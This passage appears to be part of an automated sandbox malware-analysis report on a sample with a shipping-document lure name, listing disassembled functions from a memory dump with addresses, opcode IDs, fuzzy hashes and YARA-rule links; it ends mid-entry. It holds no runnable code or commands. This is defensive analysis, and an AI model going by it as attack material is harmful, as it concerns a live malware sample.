                                                    • Instruction Fuzzy Hash: 7DF06531A25DD14FE772E72CF584B55B7E4AB20730F5A09A4D405C7916C724DD40C670
                                                    Function 0184678E Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                    • Instruction ID: 50a965ba540220696490113811e65954d01e4cbd62b95831179b8fd5932d7f74
                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                    • Instruction Fuzzy Hash: 2AE04872640214BBDB2197598D05F9ABEBCDB54F90F154155B601D7194E570DE00D690
                                                    Function 018708C0 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                    • Instruction ID: 7232ce5f25da981b27b84d52455238a1ba558ff73d8779bde687f8d9c9304fd4
                                                    • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                    • Instruction Fuzzy Hash: 2EE09B316403548BCB258A1EC540A73B7E8DF96764F15806DE90987712C231F942C6D0
                                                    Function 017A25E0 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 946fedfe9f8c99aedb8573479e6e560fc7246f903cc44c9eda984c90e7e47cd1
                                                    • Instruction ID: aa050ca303264c1a9b8761e261f2a733125f2ea15855b35c42e3221fad88701a
                                                    • Opcode Fuzzy Hash: 946fedfe9f8c99aedb8573479e6e560fc7246f903cc44c9eda984c90e7e47cd1
                                                    • Instruction Fuzzy Hash: 91E092321005549BC722BF29DD09F8AB7DAEFA4360F154615F11557195CB70A950C7C8
                                                    Function 0185A456 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                    • Instruction ID: 1d728cfac18e17565dd827c6957ebba4e13a9017a6aad93a64fa147823a974b4
                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                    • Instruction Fuzzy Hash: 83E09231010612DFE7766F6AC98CB56BEE4FF50711F148D2CE096524B4C7B599C1CA40
                                                    Function 01824000 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                    • Instruction ID: e06ea9830d410a6221d9ba2e998522d1637f374cf28af23fb2b96377bee58ba6
                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                    • Instruction Fuzzy Hash: 27E0C2343003158FE756CF1AC040B627BB6BFD5B10F28C069E9498F205EB36E982CB50
                                                    Function 017DCA38 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 135bad9fcd6c79a88319240c3948f79db14a44617d0900b2aae56349256c0883
                                                    • Instruction ID: 2a4505677adac8e7a33290899d9f4fa0984d6da115c3e8cdb6dd6823223a1a70
                                                    • Opcode Fuzzy Hash: 135bad9fcd6c79a88319240c3948f79db14a44617d0900b2aae56349256c0883
                                                    • Instruction Fuzzy Hash: 28D02B325D50206ACB37E1187C48FD3BB699B84720F0548A9F20896015D524CD81D6C4
                                                    Function 0179823B Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction ID: 1bb4bdcac4e43494fa7407a55394ece89c47937d59c0bca85f7ac36696606a54
                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction Fuzzy Hash: C9E0C232448A18EFDF322F25EC08F52F6E5FF59B10F2448AAE081070A987B4AC85CB45
                                                    Function 017A2050 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebea108ca51ea3b62ef5591ec81876dd8be8d5e576653a94ce4f14eceab11783
                                                    • Instruction ID: 7aed5557f85ba1777f1269874bada073ed6049c3166e08e7d3dc7372485b492b
                                                    • Opcode Fuzzy Hash: ebea108ca51ea3b62ef5591ec81876dd8be8d5e576653a94ce4f14eceab11783
                                                    • Instruction Fuzzy Hash: 27E08C331004506BC212FB5DDD40F8AB39AEFA4360F540221F15187698CB60AD40C794
                                                    Function 017D8A90 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                    • Instruction ID: 77b8fc7a6c147e2021991f082656ccead0e8ce0fd2d17d79790db6ab50cb392d
                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                    • Instruction Fuzzy Hash: 59E08633111A1887C728DE18D511B72B7B4EF85720F09463EE61347780C534F544C796
                                                    Function 017F6AA4 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                    • Instruction ID: ef5d6f0c316aed914269733cce5ac67fca5d8029ccee880a6fcf430ba09e9e01
                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                    • Instruction Fuzzy Hash: D9D05E36511A50AFC3329F1BEA04D53FBF9FBC4A107050A2EE54583A24C770E846CBA0
                                                    Function 017DE59C Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                    • Instruction ID: 221b42aba18a17a0d9d3ae7225adc96f1305e8fc9743f9883184170e43de1768
                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                    • Instruction Fuzzy Hash: 2FD0A933604620ABD772AA1CFC04FC373E8BB88B20F060859F028C7098C360AC81CA84
                                                    Function 0181E908 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                    • Instruction ID: b244326554d518e630d98b5cd5137e2242f0ed975101812a09cba5c77ef0d539
                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                    • Instruction Fuzzy Hash: 70E08C329406809BCF13DFA9C644F4AFBB9BB80B00F180044A4089B268C634A900CB40
                                                    Function 0179A0E3 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction ID: 21676073d7471ab82e7aed028e3218282747178c0e1369c0a256abfe7796561a
                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction Fuzzy Hash: 20D0223221303193CF2856997844FA3E925EB81A90F1A006C740A93804C1148C82C2E0
                                                    Function 017DA830 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction ID: 71b258fc9b9094e211567bd122376632dad8fc028bd2f2947db7a7e3b27dc897
                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction Fuzzy Hash: F2D012371D054DBBCB119FA6DC41F957BA9E764BA0F444420F514875A0C63AE990D584
                                                    Function 017DCA24 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9716e5a5b14fad8ad864cb63f3c9405bdc78d49fe454cefbe15430927decb5a
                                                    • Instruction ID: c2f7e6b47f14d994c3d4a152ae21ea588a4cd139a1e9d8ff16d080e5f406faa9
                                                    • Opcode Fuzzy Hash: b9716e5a5b14fad8ad864cb63f3c9405bdc78d49fe454cefbe15430927decb5a
                                                    • Instruction Fuzzy Hash: FBD0A731541005CBDF17CF88C551E6EB674FF60740B40006CE70091024E724FE01CA40
                                                    Function 017B02A0 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction ID: eb1760bcaceb900061ca18aea3fb070dd84173d4b090dd8bb011cf8e8fb4be40
                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction Fuzzy Hash: FED0C935256E80CFD61BCB0CC9A4B9673B4BB44B48F810490F501CBB62D73CD944CA00
                                                    Function 017DC700 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction ID: 82e0d32256a920b3e4a60e205124c75b07efa6875cba199bef9a6659052dfc2c
                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction Fuzzy Hash: 58C01232290648AFC712AA99CD41F42BBA9EBA8B40F000421F2048B6B0C631E860EA84
                                                    Function 017C0310 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction ID: 7447321bb6778e9e444c0817cc9a5cdf2cc239e4811c6ebb08c69263d02a5c73
                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction Fuzzy Hash: 15D01236100248EFCB01DF41C890D9AB72AFBD8B10F10801DFD19076108A31ED63DA90
                                                    Function 017A0750 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction ID: fe7c0f0ac1e1145a16aa1c0edc41b64d89218af9c0168b8833d191b63a4ec52a
                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction Fuzzy Hash: 0AC04C757015418FCF15DF19D6D4F45B7E4F744740F150890E905CB721E724E841CA10
                                                    Function 017E4340 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                    • Instruction ID: 6644c73e3fa28f8e4cb3bf586e6d65db0a26d17d2824564d2a231a11881101ff
                                                    • Opcode Fuzzy Hash: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                    • Instruction Fuzzy Hash: 9C900231609800129640725848845478005E7E1301B55C025E1424574CCB14CB6A5362
                                                    Function 017E4650 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                    • Instruction ID: b291931a4e87a40471a9ecc4305c6f728e5fa3e5d4b47de65b12ec76c562859e
                                                    • Opcode Fuzzy Hash: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                    • Instruction Fuzzy Hash: 4990026160550042464072584804407A005E7E2301395C129A1554570CC718CA69936A
                                                    Function 017E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                    • Instruction ID: 6c44f5c5bf651923b49305e9fb44a8b91baabc4a1739790133fd8edd0fcfc4fd
                                                    • Opcode Fuzzy Hash: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                    • Instruction Fuzzy Hash: 6190023120540802D6807258440464B4005D7D2301F95C029A1025674DCB15CB6D77A2
                                                    Function 017E2BE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                    • Instruction ID: 7b1ba6754d4c9ee7960e785b3a3a4b0eb73771e98a04e6f7f10f45b0d8ac4b04
                                                    • Opcode Fuzzy Hash: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                    • Instruction Fuzzy Hash: 9290023120944842D64072584404A474015D7D1305F55C025A10646B4DD725CF69B762
                                                    Function 017E2BA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                    • Instruction ID: 087dd9124830e8a1c4a5d9302d7d1a2d3cc7a6d8bcc504a49d59b6f64a263aca
                                                    • Opcode Fuzzy Hash: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                    • Instruction Fuzzy Hash: 6C90023160940802D650725844147474005D7D1301F55C025A1024674DC755CB6977A2
                                                    Function 017E2B80 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                    • Instruction ID: 7fc8a785a75296ba99d360c0638f0dc041f30bd1febf5c0ff1ae08ac83b5e600
                                                    • Opcode Fuzzy Hash: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                    • Instruction Fuzzy Hash: 7190023120540802D604725848046874005D7D1301F55C025A7024675ED765CAA57232
                                                    Function 017E2AF0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                    • Instruction ID: c832d196e41a9951aaecbaafad7b9651a6469ddb13cf567fc6fd441ca621e374
                                                    • Opcode Fuzzy Hash: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                    • Instruction Fuzzy Hash: 9A900225225400020645B658060450B4445E7D7351395C029F24165B0CC721CA795322
                                                    Function 017E2AD0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                    • Instruction ID: ca2ef29ed05e5a28a9142894a2deb963cefc1c507e1fdef0be8db907a2f877b9
                                                    • Opcode Fuzzy Hash: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                    • Instruction Fuzzy Hash: 5D900225215400030605B65807045074046D7D6351355C035F2015570CD721CA755222
                                                    Function 017E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                    • Instruction ID: 39f898736abb3c8ac36f8f185b0d8b5313997ddfe245d2dd3b24bf2ad4288d22
                                                    • Opcode Fuzzy Hash: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                    • Instruction Fuzzy Hash: D99002A1205540924A00B3588404B0B8505D7E1201B55C02AE2054570CC625CA659236
                                                    Function 017E2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                    • Instruction ID: 50a82235597b351e2992b5d30f079a6bc7014ebe88bb28efa8f4beea9e501ba8
                                                    • Opcode Fuzzy Hash: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                    • Instruction Fuzzy Hash: 5090022130540003D640725854186078005E7E2301F55D025E1414574CDA15CA6A5323
                                                    Function 017E2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                    • Instruction ID: ebff6c630a43aa281a827125bb8981e0712b2e54e7ac38fb2bab17018018985c
                                                    • Opcode Fuzzy Hash: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                    • Instruction Fuzzy Hash: CC90022921740002D6807258540860B4005D7D2202F95D429A1015578CCA15CA7D5322
                                                    Function 017E2D00 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                    • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                    • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                    • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                    Function 017E2DD0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
